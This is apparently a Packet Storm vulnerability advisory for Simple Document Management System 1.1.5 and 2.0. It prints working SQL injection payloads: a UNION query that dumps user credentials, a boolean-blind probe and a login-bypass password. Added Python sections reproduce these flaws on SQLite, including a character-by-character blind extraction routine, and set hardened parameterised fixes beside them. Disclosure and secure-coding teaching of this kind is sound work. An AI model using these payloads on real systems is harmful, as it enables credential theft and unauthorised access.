Simple Document Management System 1.1.5 / 2.0 SQL Injection

2012-06-16T00:00:00
ID PACKETSTORM:113762
Type packetstorm
Reporter JosS
Modified 2012-06-16T00:00:00

Description

                                        
Simple Document Management System 1.1.5 / 2.0 Multiple Vulnerabilities  
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS  
  
twitter: @JossGongora  
  
contact: sys-project[at]hotmail[dot]com  
website: http://www.hack0wn.com/  
  
download: http://mirror.us.cc.com.au/pub/cafuego/sdms  
  
-----------  
version 2.0  
-----------  
  
~~ [Multiple SQL]  
  
/list.php?folder_id=['foo]  
/detail.php?doc_id=['foo]  
  
<code>  
line 13: if(isset($_GET['folder_id'])) $folder_id = $_GET['folder_id'];  
...  
line 48: if(isset($order)) {  
$query = "SELECT id,name FROM folders WHERE parent=$folder_id ORDER BY ". rawurldecode($order);  
} else {  
$query = "SELECT id,name FROM folders WHERE parent=$folder_id";  
}  
</code>  
  
.xpl! :: /list.php?folder_id=-10+union+all+select+1,1,1,concat_ws(char(58),user,pass,name,email),1,1,1,1,1,1,0+from+users--  
  
  
~~ [Blind]  
  
/user_photo.php?view=[foo]  
  
<code>  
$query = "SELECT photo,mime FROM users_info WHERE id=".$_GET['view'];  
$res = mysql_query($query, $sql);  
if( mysql_num_rows($res) == 1 ) {  
$row = mysql_fetch_array($res);  
header( "Content-type: $row[mime]" );  
echo "". base64_decode($row[photo]) ."";  
} else {  
echo "Badness!\n";  
}  
</code>  
  
.poc! :: /user_photo.php?view=2+and+1=1  
/user_photo.php?view=2+and+1=2  
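Added example, not SDMS code: the two 2.0 injection points above (list.php line 48 and user_photo.php) re-created on an in-memory SQLite database so the mechanics can be run offline. Table layouts and rows are constructed from the column names the advisory's queries use; SQLite has no concat_ws(), so the union payload here simply selects the two columns the emulated query has (a UNION must match the column count of the query it lands in, which is why the advisory's payload carries eleven). Each vulnerable function is shown next to a hardened form that validates and binds the id, and the .poc! boolean oracle is generalised into a character-by-character extraction.

```python
import sqlite3

# Constructed schema and rows standing in for SDMS 2.0's folders/users/users_info
# tables (column names follow the advisory's queries; the data is made up).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE folders (id INTEGER, name TEXT, parent INTEGER);
        CREATE TABLE users (id INTEGER, user TEXT, pass TEXT, name TEXT, email TEXT);
        CREATE TABLE users_info (id INTEGER, photo TEXT, mime TEXT);
        INSERT INTO folders VALUES (1, 'Public', 0), (2, 'Private', 0);
        INSERT INTO users VALUES (1, 'admin', 's3cret', 'Admin', 'admin@example.invalid');
        INSERT INTO users_info VALUES (2, 'aGVsbG8=', 'image/png');
    """)
    return conn

# list.php line 48, as written: $folder_id is spliced into the SQL unquoted,
# so a UNION with the same column count (two here) appends attacker-chosen rows.
def list_folders_vuln(conn, folder_id):
    query = "SELECT id,name FROM folders WHERE parent=" + folder_id
    return conn.execute(query).fetchall()

# Hardened form: validate the integer, then bind it (mysqli/PDO prepared
# statements in the PHP original); non-numeric input never reaches the parser.
def list_folders_fixed(conn, folder_id):
    try:
        parent = int(folder_id)
    except ValueError:
        return []
    return conn.execute("SELECT id,name FROM folders WHERE parent=?", (parent,)).fetchall()

# user_photo.php: the only signal is whether exactly one row came back (photo
# served) or not ("Badness!"), which is a boolean-blind oracle.
def photo_vuln(conn, view):
    query = "SELECT photo,mime FROM users_info WHERE id=" + view
    return len(conn.execute(query).fetchall()) == 1

def photo_fixed(conn, view):
    try:
        uid = int(view)
    except ValueError:
        return False
    rows = conn.execute("SELECT photo,mime FROM users_info WHERE id=?", (uid,)).fetchall()
    return len(rows) == 1

# The advisory's .poc! (2+and+1=1 / 2+and+1=2) generalised: binary-search each
# character of an arbitrary scalar subquery through the true/false oracle,
# about seven requests per character, with no data ever appearing in a response.
def blind_extract(conn, subquery, maxlen=32):
    out = ""
    for pos in range(1, maxlen + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # coalesce: substr past the end yields '' and unicode('') is NULL
            probe = f"2 AND coalesce(unicode(substr(({subquery}),{pos},1)),0)>{mid}"
            if photo_vuln(conn, probe):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break          # ran off the end of the value
        out += chr(lo)
    return out

if __name__ == "__main__":
    db = make_db()
    print(list_folders_vuln(db, "-10 UNION ALL SELECT user,pass FROM users--"))
    print(blind_extract(db, "SELECT pass FROM users WHERE user='admin'"))
```

The union payload returns the users row straight into the folder listing; the blind routine recovers the same password without ever seeing it in a response, using only the served/"Badness!" distinction. Both hardened functions reject the payloads before any SQL is built.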
  
  
-------------  
version 1.1.5  
-------------  
  
~~ [Auth Bypass]  
  
/login.php  
  
<code>  
$result = @mysql_query("SELECT pass != PASSWORD('$pass') FROM users WHERE user='$login'");  
$row = @mysql_fetch_array($result);  
if( $row[0] != 0 ) {  
header("Location: index.php");  
exit;  
}  
  
$result = @mysql_query("SELECT id,name FROM users WHERE user='$login'");  
$row = @mysql_fetch_array($result);  
$id = $row[id];  
$name = $row[name];  
</code>  
  
.xpl! :: user: Admin  
password: ') FROM users WHERE id=-1 UNION SELECT 0 FROM users --  
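Added example, not SDMS code: the 1.1.5 login.php check re-created on SQLite so the bypass can be stepped through. MySQL's PASSWORD() is replaced by a registered SHA-1 stub purely so the advisory's query runs unchanged; the users table and the Admin row are constructed. The vulnerable function mirrors the PHP flow (first query decides, second query fetches id and name) and is shown beside a hardened form that binds the username and compares the hash in application code.

```python
import hashlib
import hmac
import sqlite3

# Stand-in for MySQL's PASSWORD(), registered into SQLite so the advisory's
# query runs unchanged; the hash itself is irrelevant to the bypass.
def mysql_password_stub(p):
    return hashlib.sha1(p.encode()).hexdigest()

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("PASSWORD", 1, mysql_password_stub)
    conn.execute("CREATE TABLE users (id INTEGER, user TEXT, pass TEXT, name TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'Admin', PASSWORD('hunter2'), 'Administrator')")
    return conn

# The advisory's password field, trailing space included (MySQL's -- comment
# needs whitespace after it; SQLite does not care).
BYPASS_PASSWORD = "') FROM users WHERE id=-1 UNION SELECT 0 FROM users -- "

# login.php as written: "does the password match" is computed inside SQL from
# interpolated input, so the attacker rewrites the decision itself. The payload
# closes PASSWORD('...'), empties the real SELECT with id=-1, and UNIONs in a
# literal 0, which is exactly the value the != 0 check lets through.
def login_vuln(conn, login, pw):
    q1 = f"SELECT pass != PASSWORD('{pw}') FROM users WHERE user='{login}'"
    row = conn.execute(q1).fetchone()
    if row is None or row[0] != 0:     # header("Location: index.php"); exit
        return None                    # (a missing row is treated as failure here)
    q2 = f"SELECT id,name FROM users WHERE user='{login}'"
    row = conn.execute(q2).fetchone()
    return (row[0], row[1]) if row else None

# Hardened form: bind the username, fetch the stored hash, and compare in
# application code in constant time; the password never touches SQL text.
# (A real fix would also drop PASSWORD() for bcrypt/argon2; not shown here.)
def login_fixed(conn, login, pw):
    row = conn.execute("SELECT id,name,pass FROM users WHERE user=?", (login,)).fetchone()
    if row is None or not hmac.compare_digest(row[2], mysql_password_stub(pw)):
        return None
    return (row[0], row[1])

if __name__ == "__main__":
    db = make_db()
    print("vuln  :", login_vuln(db, "Admin", BYPASS_PASSWORD))
    print("fixed :", login_fixed(db, "Admin", BYPASS_PASSWORD))
```

Because the second query only looks at the username, the bypass logs in as whichever account name is supplied; the injected password never has to match anything.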
  
  
__h0__  